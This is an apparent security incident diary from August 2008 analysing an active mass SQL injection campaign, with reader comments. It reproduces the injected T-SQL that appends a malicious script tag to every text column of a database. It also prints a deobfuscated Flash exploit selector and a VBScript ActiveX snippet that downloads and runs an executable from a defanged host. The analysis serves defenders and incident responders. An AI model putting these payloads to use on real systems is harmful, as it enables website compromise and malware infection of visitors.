More SQL Injections - very active right now

Published: 2008-08-08
Last Updated: 2008-08-08 16:40:52 UTC
by Mark Hofman (Version: 1)
5 comment(s)

Scott one of our readers wrote in to let us know that attempts were being made on his servers through an SQL injection.  He was the first and assisted with analysis, but he was not the last.  Since the first report we have received several in the last 4 hours or so.  There seems to be a lot of activity with this particular attack.

It looks like a repeat/variant on the attacks mentioned by Bojan here.

Overview:

                                                                                   |---i/f16.swf
                                                              |--- i1.html ---|---i/f28.swf
                              |--- Flash.htm -------|                    |---i/f64.swf
                              |                              |--- f2.html ---|---i/f115.swf
                              |--- 06014.htm                             |---i/f45.swf
                              |                                                   |---i/f47.swf
w.js --- new.htm ---|--- yahoo.htm--|
                              |                       |
                              |--- office.htm--| --rondll32.exe--msyahoo.exe--wsv.exe/thunder.exe
                              |                       |
                              |--- ksx.htm ----|

The Injection:
The string being injected is

“DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726
368617228323535292C40432076617263686172283430303029204445434C415245205461626
C655F437572736------------snip ------------2204445414C4C4F43436F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)" :”

Which breaks down into:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo. 
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo.  1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM  Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

Various types of sites seem to be hit at the moment.  From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.

Next:

A user visiting the site will hit w.js which, if they are using english, will pull down new.htm.  new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages,  flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm.   Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html

i1.html & f2.html

These file contains some java script:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";c=eval("String.fromCharCode("+c+")");document.write("<script>"+c+"<\/script>");
</script>S

This expands out to:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}; document.write("")

So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc).   Detection for these is poor.  The IE versions 9/36 at VT detect the file as malicious and for FF 10/36 detect the file as being malicious.

yahoo.htm

The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute.

pre>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script
</pre>

Office.htm

Attempts to create activeX objects and pulls the same rondll32.exe.  It looks like rondll32.exe pulls down thunder.exe and wsv.exe

ksx.htm

Attempts get the browser to include the rondll32.exe file

Detection for rondll32.exe is good with most AV products catching this one.

06014.htm

was unavailable at the time I checked.

 

These attacks are happening right now.  The people that reported them identified the attacks in their log files and IDS systems.  It is good to see that people are checking their logs.   Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site.  This round looks like it has just started.  We'll keep an eye on how this develops.

 

Cheers.

Mark - Shearwater

 

 




 

Keywords: sql injection
5 comment(s)

Comments

I'm seeing a lot of this one in my logs. They're not getting anywhere but they are proving to be a source of annoyance by triggering automated error tracking.
A related story that Yahoo was hacked by this injection.

http://news.softpedia.com/news/My-yahoo-com-Hosts-Trojans-91662.shtml
I had about 200 separate IP make attempts made on my server over the last 48 hours. One thing I noted was IPs are only used twice, perhaps trying to get under some thresholds.

As someone fairly new to server management and not a coder what I would appreciate seeing here at ISC is real ways to block attacks like this. After much searching I found an example http://www.0x000000.com/?i=567 of a .htaccess file that, on my server at least, stopped the attacks. No doubt there are better ways, and maybe one has been discussed here. If that's the case a link to it in each story about this would be useful.
Ive had many of these attacks on my site over the past 2 days, they seem to change IP, OS and browser for each new attack.
I had a remote user call regarding this issue. They apparently received the Anti-Virus warning when clicking on a story in Yahoo.com. The software Firewall alerted us that this trojan is attempting to run wab.exe.

Since we do not use Outlook or Outlook express on our units, the software firewall is set not to allow that program to access the internet. (This stops most users from setting up their own e-mail and some of the admins wonder why I do this.) I'm not seeing anything coming accross our network at this time but I'm sure come tomorrow morning, I'm going to be popping some Alka-Seltzer by noon.

Diary Archives